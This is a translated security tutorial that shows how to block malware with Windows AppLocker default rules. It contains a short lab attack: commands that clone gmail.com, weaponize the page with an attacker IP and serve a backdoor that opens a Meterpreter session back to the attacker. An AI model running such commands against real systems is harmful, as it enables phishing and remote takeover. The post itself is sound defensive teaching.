使用AppLocker入门

作者：John Strand

我经常接到客户的咨询，他们在应用白名单方面不知从何入手。许多组织试图在整个环境中对每个应用实施完整的应用白名单，虽然这个目标听起来不错，但实际上并不可行。

为什么呢？因为管理开销巨大。跟踪所有变更和处理补丁几乎是一项全职工作。有些组织尝试购买产品来自动化这一过程，但这几乎从未成功过。

别再寻找捷径了。每次你这样做，上帝都会出于恶意在你的网络上部署另一个机器人。而且，他是一位复仇之神。别惹他生气。

相反，我们应该问：有没有办法实现80%的目标？有没有某种程度的白名单可以阻止95%以上的驱动式攻击？答案是肯定的。

在这篇博客中，我们将介绍如何使用Windows AppLocker基于目录实现白名单。但首先，让我们看看没有AppLocker时会发生什么。我们将设置一个简单的后门，让其连接回ADHD系统。请注意，目标不是展示如何绕过EDR和端点产品，而是创建一个简单的后门并让其连接。

顺便说一下，我们将使用ADHD。你可以在这里找到它：https://www.activecountermeasures.com/free-tools/adhd

此外，我们将在默认的Windows 10系统上演示，没有安装防病毒软件。本博客的目标是逐步介绍AppLocker，而不是绕过AV。如果你想了解如何绕过AV，请查看以下网络研讨会：

首先，我们需要一些恶意软件。幸运的是，我们有几个脚本可以大大简化这一过程。请确保你的Windows和Linux系统都在运行。

在Linux系统上，请运行以下命令：

1

$ifconfig

请记下以太网适配器的IP地址。请注意，我的适配器名为ens33，IP地址为192.168.123.128。你的IP地址和适配器名称可能不同。请记下你的ADHD Linux系统的IP地址。

现在，运行以下命令启动一个简单的后门和后门监听器：

1
2
3
4
5

$ sudo su -
# cd /opt/java-web-attack/
# ./clone.sh https://gmail.com
# ./weaponize.py index.html 192.168.123.128 <<<--- 你的IP会不同！！！！
# ./serve.sh

现在，从你的Windows系统浏览到Linux系统，下载恶意软件并运行它！当你返回ADHD Linux系统时，应该会看到一个Meterpreter会话。

现在，让我们阻止这种情况发生！首先，配置AppLocker。为此，你需要以管理员账户访问Windows系统的本地安全策略。只需按下Windows键（键盘左下角，看起来像Windows徽标），然后输入“Local Security”。应该会弹出如下菜单，请选择“Local Security Policy”。

接下来，配置AppLocker。请转到“Security Settings” > “Application Control Policies”，然后选择“AppLocker”。在右侧窗格中，你会看到所有策略的强制执行规则数为0。我们将添加默认规则。选择默认规则是因为这样不太可能导致系统崩溃。

请选择上述每个规则组（可执行文件、Windows安装程序、脚本和打包应用），对于每个组，在显示“There are no items to show in this view”的区域右键单击，然后选择“Create Default Rules”。这应该会为每个组生成一组规则。看起来应该类似于以下内容：

现在，我们需要启动应用程序身份服务。按下Windows键，输入“Services”，这将打开服务应用。请选择该应用，然后双击“Application Identity”。当应用程序身份属性对话框打开时，请按下“Start”按钮。这将启动服务。

现在，在Windows系统上创建一个标准用户账户。我将其命名为“whitelist”。接下来，以管理员身份注销，并以“whitelist”身份重新登录。现在，浏览到你的Linux系统，下载恶意软件并再次尝试运行它。你应该会收到错误提示。

这个演示的目的是展示基于目录路径创建默认规则是多么容易。这是100%有效的吗？不是，甚至差得远。但它会阻止大量驱动式攻击，并让大多数渗透测试人员感到沮丧吗？绝对会。

顺便说一下，你是否想观看关于如何通过Active Directory中的组策略实现这一点的网络研讨会？太棒了。请查看这个：

想提升技能并从John本人那里学习更多内容吗？你可以查看以下他的课程：

• SOC核心技能
• 主动防御和网络欺骗
• 通过BHIS和MITRE ATT&CK入门安全
• 渗透测试简介

提供实时/虚拟和点播形式。